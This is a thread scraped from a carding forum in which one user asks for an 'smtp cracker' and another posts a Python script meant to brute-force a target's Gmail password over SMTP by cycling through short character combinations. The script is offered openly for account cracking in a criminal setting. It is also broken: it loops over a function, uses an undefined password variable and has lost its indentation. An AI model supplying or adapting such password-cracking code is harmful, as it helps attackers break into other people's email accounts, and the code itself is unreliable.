Carder.life

Carder.life (http://txgate.io:443/index.php)
-   Hacking & Coding (http://txgate.io:443/forumdisplay.php?f=48)
-   -   Anyone got this tool? (http://txgate.io:443/showthread.php?t=61362)

Kot1 01-31-2025 07:12 AM


http://imgur.com/a/HXcyp
smtp cracker i think its coded in python get in touch

negdwol119 01-31-2025 07:43 AM


Screenshot doesn't contain any info that helps in identifying the tool post the name if you have

brave dumps 01-31-2025 08:06 AM


Is that all the info you got ?

Bruklincitylin 01-31-2025 08:27 AM


you can only brute force for smtp

Bradega 01-31-2025 08:40 AM


Looking for something like this?
Code:
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px solid rgb(0, 0, 0);
width: 640px;
height: 386px;
text-align: left;
overflow: auto;
background: rgb(37, 37, 37) none repeat scroll 0% 0%;
border-radius: 5px;
font-size: 11px;
text-shadow: none;">import itertools
import smtplib
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input("Enter Target's Address: ")
def print_perms(chars, minlen, maxlen):
for n in range(minlen, maxlen+1):
for perm in itertools.product(chars, repeat=n):
print(''.join(perm))
print_perms("abcdefghijklmnopqrstuvwxyz1234567890" , 2, 4)
for symbols in print_perms:
try:
smtpserver.login(user, password)
print "[+] Password Cracked: %s" % symbols
break;
except smtplib.SMTPAuthenticationError:
print "[!] Password Inccorect: %s" % symbols</pre>
</br></br>


All times are GMT. The time now is 03:58 AM.

Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc.